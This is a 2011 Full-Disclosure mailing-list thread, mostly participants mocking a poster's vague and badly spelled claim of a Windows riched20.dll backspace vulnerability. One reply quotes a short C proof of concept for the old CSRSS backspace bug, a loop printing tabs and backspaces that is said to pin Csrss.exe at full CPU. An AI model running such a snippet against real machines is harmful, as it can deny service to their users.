Before asking others to learn reading, learn writing yourself.

By the way, just a hint concerning this whole thread: maybe if you first
start by understanding very well what you want to explain, it will sure
become much easier.
So you shouldn't blame others for the consequences of your own lacks.


Le 12/06/2011 04:34, -= Glowing Doom =- a écrit :
> Umm... someone ELSE showed the fact that, there is something with
> backspace, and MS... Learn to read, ill prmise to learn to speeel :)
> To many IF's, do some research, instead of flaming.
> On 12 June 2011 12:31, adam < <>> wrote:
>     At the end of the day, you're going to be treated like a child as
>     long as you continue to type like one. 
>     The entertaining part for me is how each of your replies contradicts
>     a previous one. According to you, this /vulnerability/ *has existed
>     for years*. And also according to you, the reason why the original
>     email was filled with spelling errors is because it *was rushed out
>     due to you being "awake" at 6AM.* Do you see the inconsistency
>     between those two statements? Your response to Christian also
>     indicated that you/ /*/didn't/ just discover this*.
>     IF this is an old vulnerability and IF you've known about it for an
>     extended period of time - WHY did you have to post it right when you
>     did? It's old, you've known about it for a while, it's existed for
>     years, yet it couldn't wait until later in the day? It couldn't wait
>     until you had time to skim over the email and correct any
>     spelling/grammar mistakes? It absolutely had to be posted right then
>     and there? 
>     On Sat, Jun 11, 2011 at 9:14 PM, -= Glowing Doom =-
>     < <>> wrote:
>         Thats why i the people who do understand it, can see that it is
>         there... yes, VERY hard to expalin, id LOVE to see you try.
>         On 12 June 2011 12:11, adam <
>         <>> wrote:
>             Furthermore, pretending that we [the readers] are somehow at
>             fault here (for not understanding) isn't going to get you
>             very far. The only thing consistent in this entire thread is
>             that people /kind of/ want to know what you're talking
>             about, but aren't able to due to the poor writing style and
>             spelling/grammar errors.
>             It should be noted that no one is being anal about typos, I
>             fully understand that people make mistakes. The difference
>             is that it appears you didn't even so much as proof read the
>             original email.
>             On Sat, Jun 11, 2011 at 9:04 PM, phocean <
>             <>> wrote:
>                 Hi n3td3v... oops!... secn3t (that is close),
>                 Sorry but I don't understand anything to this thread.
>                 Each of your emails is such a pain to read, that I stop
>                 at the first
>                 sentence.
>                 We are all busy and don't want to take 20 min to
>                 decipher your writing
>                 with the risk that it is not deserving it.
>                 Please clarify and give consistent technical facts.
>                 Thanks.
>                 Le 12/06/2011 03:33, -= Glowing Doom =- a écrit :
>                 > This is NOT coded..  the PoC i am explaining, is
>                 possible with simply
>                 > copyying text,then using a sequence of keys, to make
>                 the actual
>                 > sentence/s, appear.
>                 > This code is not what shows up when it is dissected.
>                 > It shows up with many x41 all over the email when it
>                 is done properly .
>                 > Regards.
>                 >
>                 >
>                 >
>                 > On 12 June 2011 11:29, Christian Sciberras
>                 < <>
>                 > < <>>>
>                 wrote:
>                 >
>                 >     For those lazy enough to search:
>                 >
>                 >    
>                 >
>                 >
>                 >     Excerpt:
>                 >
>                 >     Basicaly just compile this and you will get a 100%
>                 processor usage
>                 >     by the compiled exploit and Csrss.exe
>                 >
>                 >     #include <stdio.h>
>                 >     int main(void)
>                 >     {
>                 >     while(1)
>                 >     printf("\t\t\b\b\b\b\b\b");
>                 >     return 0;
>                 >     }
>                 >
>                 >
>                 >     How this helps in sending spam is beyond me.
>                 >
>                 >
>                 >
>                 >     On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton
>                 < <>
>                 >     <
>                 <>>> wrote:
>                 >
>                 >         On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing
>                 Doom =-
>                 >         < <>
>                 < <>>> wrote:
>                 >
>                 >         > It is now, over 1yr old atleast and exists
>                 in riched20.dll.
>                 >         > This PoC info is over for me also.
>                 >         Microsoft had problems with a backspace in the
>                 past. Search for
>                 >         "CSRSS
>                 >         Backspace Bug".
>                 >
>                 >         > [SNIP
>                 >
>                 >         Jeff
>                 >
>                 >         _______________________________________________
>                 >         Full-Disclosure - We believe in it.
>                 >         Charter:
>                 >         Hosted and sponsored by Secunia -
>                 >
>                 >
>                 >
>                 >
>                 >
>                 > _______________________________________________
>                 > Full-Disclosure - We believe in it.
>                 > Charter:
>                 > Hosted and sponsored by Secunia -
>                 --
>                 phocean
>                 _______________________________________________
>                 Full-Disclosure - We believe in it.
>                 Charter:
>                 Hosted and sponsored by Secunia -
>             _______________________________________________
>             Full-Disclosure - We believe in it.
>             Charter:
>             Hosted and sponsored by Secunia -
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> Hosted and sponsored by Secunia -


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